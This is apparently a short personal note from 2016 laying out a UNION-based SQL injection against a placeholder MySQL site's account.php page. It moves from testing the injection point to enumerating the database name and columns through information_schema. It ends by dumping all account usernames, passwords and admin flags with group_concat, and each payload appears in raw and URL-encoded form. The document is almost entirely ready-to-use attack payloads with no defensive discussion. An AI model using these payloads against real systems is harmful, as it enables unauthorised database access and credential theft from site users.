-- original url -- www.your_page.com/account.php?username=xxx -- sql injection test -- www.your_page.com/account.php?username=xxx' -- original query SELECT username, mysignature FROM accounts WHERE username = 'xxx'; -- we are guessing that we have password column in accounts table SELECT username, mysignature FROM accounts WHERE username = 'xxx' UNION SELECT username, password FROM accounts; -- '; -- url format SELECT username, mysignature FROM accounts WHERE username = 'xxx'%20UNION%20SELECT%20username,password%20FROM%20accounts;%20--%20'; -- sql injection test 2 -- www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20username,password%20FROM%20accounts;%20--%20 -- if it works ... well -- no more guessing, we have to check the column list for accounts table -- check main db name SELECT DATABASE(),DATABASE(); -- sql that we want to execute SELECT username, mysignature FROM accounts WHERE username = 'xxx' UNION SELECT DATABASE(),DATABASE() -- '; -- url format SELECT username, mysignature FROM accounts WHERE username = 'xxx'%20UNION%20SELECT%20DATABASE(),DATABASE()%20--%20'; -- url -- www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20DATABASE(),DATABASE()%20--%20'; -- -- -- get list of columns for table SELECT column_name,column_name FROM information_schema.columns WHERE table_name='accounts'; -- sql that we want to execute SELECT username, mysignature FROM accounts WHERE username = 'xxx' UNION SELECT column_name,column_name FROM information_schema.columns WHERE table_name='accounts'; -- '; -- url format SELECT username, mysignature FROM accounts WHERE username = 'xxx'%20UNION%20SELECT%20column_name,column_name%20FROM%20information_schema.columns%20WHERE%20table_name='accounts';%20--%20'; -- url -- www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20column_name,column_name%20FROM%20information_schema.columns%20WHERE%20table_name='accounts';%20--%20'; -- -- get all accounts data in two column SELECT group_concat(concat(cid,'-',username,'-',password,'-',mysignature,'-',is_admin,'-',firstname,'-',lastname) SEPARATOR '/'), null FROM accounts; -- sql that we want to execute SELECT username, mysignature FROM accounts WHERE username = 'xxx' UNION SELECT group_concat(concat(cid,'-',username,'-',password,'-',mysignature,'-',is_admin,'-',firstname,'-',lastname) SEPARATOR '/'), null FROM accounts; -- url format SELECT username, mysignature FROM accounts WHERE username = 'xxx'%20UNION%20SELECT%20group_concat(concat(cid,'-',username,'-',password,'-',mysignature,'-',is_admin,'-',firstname,'-',lastname)%20SEPARATOR%20'/'),%20null%20FROM%20accounts; -- url -- www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20group_concat(concat(cid,'-',username,'-',password,'-',mysignature,'-',is_admin,'-',firstname,'-',lastname)%20SEPARATOR%20'/'),%20null%20FROM%20accounts;%20--%20
↧
#note – 22.11.2016 – sql injection stuff – mysql
↧